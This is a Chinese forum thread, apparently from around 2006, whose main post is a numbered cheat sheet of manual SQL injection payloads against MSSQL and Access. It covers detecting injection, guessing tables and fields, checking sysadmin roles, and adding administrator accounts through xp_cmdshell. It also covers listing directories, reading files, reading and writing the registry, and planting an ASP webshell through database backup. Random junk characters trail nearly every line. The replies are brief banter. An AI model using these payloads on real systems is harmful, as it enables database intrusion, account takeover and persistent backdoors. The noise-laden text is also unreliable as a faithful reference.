社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4227阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 X.T.^}=  
  2.初步判断是否是mssql ;and user>0 cm7aL%D$c  
t[an,3  
  3.注入参数是字符'and [查询条件] and ''=' ^$x^JM ]/  
"2=v?,'t  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' i 3?zYaT  
;'vY^I8-L  
  5.判断数据库系统 1Z`<HW"  
~Dkje  
  ;and (select count(*) from sysobjects)>0 mssql \" .3x PkE  
yiI&>J))  
  ;and (select count(*) from msysobjects)>0 access !T @|9PCp  
'M G)noN5  
&1B)mj  
WVwNjQ2PM  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 0c:CA>F  
U 2\{ ( y  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 U<#i\4W  
DQ'+,bxk=9  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vx-u+/\  
P5aHLNit  
  9.(1)猜字段的ascii值(access) gQ/zk3?k  
L:B&`,E  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 fNB*o={r|  
k92189B9j/  
  (2)猜字段的ascii值(mssql) # <&=ZLN  
\ =83#*KK  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =2`s Uw}  
~'T]B{.+J  
  10.测试权限结构(mssql) C(?lp  
b/S4b  
^M?uv{354  
4Q3Q.(  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- A?6b)B/e?  
5(DCq(\P*  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- R8HA X  
*(r85lEou)  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- p]pFZ";70  
m0\(a_0V  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- qe\j$Cjy  
`CHgTkv  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1 k H  
Grw_SVa^  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F /t;y\)  
LXw&d]P  
  ;and 1=(select IS_MEMBER('db_owner'));-- q .?D{[2  
"pHQ  
78NAcP~6c  
QR^pu.k@  
  11.添加mssql和系统的帐户 N*o+m~:y  
xp,H5 m%  
  ;exec master.dbo.sp_addlogin username;-- *4.f*3*  
  ;exec master.dbo.sp_password null,username,password;-- r{Fu|aoa;5  
s'5 jvlG  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ,cbP yg  
*W i(%  
  ;exec master.dbo.xp_cmdshell 'net user username password /?by4v73P  
!0zM@p  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- -98bX]8  
OGae]O<  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- bg 7b!t1F  
@c.QrKSaD  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %Cm4a49FNi  
6%fU}si,  
az19-QIcg  
G.(9I~!  
  12.(1)遍历目录 i2swots  
h3JIiwv0!  
  ;create table dirs(paths varchar(100), id int) r2H]n.MT  
*Jp>)>  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' u#}zNz#C5  
2>s:wABb /  
  ;and (select top 1 paths from dirs)>0 Ou,B3kuQ+  
&Cdd  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 67f#Z&r2k  
Ho\z ^w+T`  
v'Lckw@G4  
f5`exfdHE  
  (2)遍历目录 _<5> E  
 ^mG-O  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 2#|Q =rWB  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 LR`/pet  
aP4r6lLv+  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 N(F9vZOs  
VpJ2Qpd=  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !q$IB?8   
~Ilgc CF  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;i,yT ?so  
,9q5jOnk  
BDcl1f T  
'JRkS'ay  
  13.mssql中的存储过程 "*TnkFTR  
=k0l>)  
  xp_regenumvalues 注册表根键, 子键 Y}F+4   
==|//:: \  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 JqFFI:Q5a  
Z/a]oR@  
  xp_regread 根键,子键,键值名 *jDzh;H!w  
>5XE*9  
  ;exec xp_regread Xf$,ra"  
9/Q5(P  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `bivAL  
K4oLb"gB1  
  xp_regwrite 根键,子键, 值名, 值类型, 值 79S=n,O  
]Ub?Wo7F?  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 qzV:N8+,`  
|%TH|?kB  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 -KO E2f  
VIynlvy  
  xp_regdeletevalue 根键,子键,值名 !_zmm$bR  
g3"`b)M  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |-Y,:sY:  
9n44 *sZ  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 uv._N6mj  
][#]4 _  
dZ;cs c@xv  
C+2*m=r  
  14.mssql的backup创建webshell O(wt[AEA  
E[ e ''  
  use model 8Gs{Zfp!D  
?$8OVq.w,  
  create table cmd(str image); K{"(|~=U  
?l bK;Kv  
  insert into cmd(str) values (''); r=s2wjk  
|8V+(Vzl  
  backup database model to disk='c:\l.asp'; \W #M]Q  
MheP@ [w|@  
s{hJ"lv:  
Z wIsEJz  
  15.mssql内置函数 'rU 5VrK  
h.G/HHz  
  ;and (select @@version)>0 获得Windows的版本号 DTgF,c  
+=;F vb  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa >_tn7Z0 L  
iQs(Dh=*  
  ;and (select user_name())>0 爆当前系统的连接用户 dt ;R  
H?^Poe(=(  
  ;and (select db_name())>0 得到当前连接的数据库 ,9  
}J"}poB:  
P62g7>B5^  
]6FpUF#<D  
  16.简洁的webshell eV}Ow`~I5  
P(qUx9  
  use model )*$'e<?`  
:Q!U;33aG  
  create table cmd(str image); >a@-OJ.yOk  
)1&[uE#L  
  insert into cmd(str) values (''); ;v>2z!M  
c00a;=ji  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八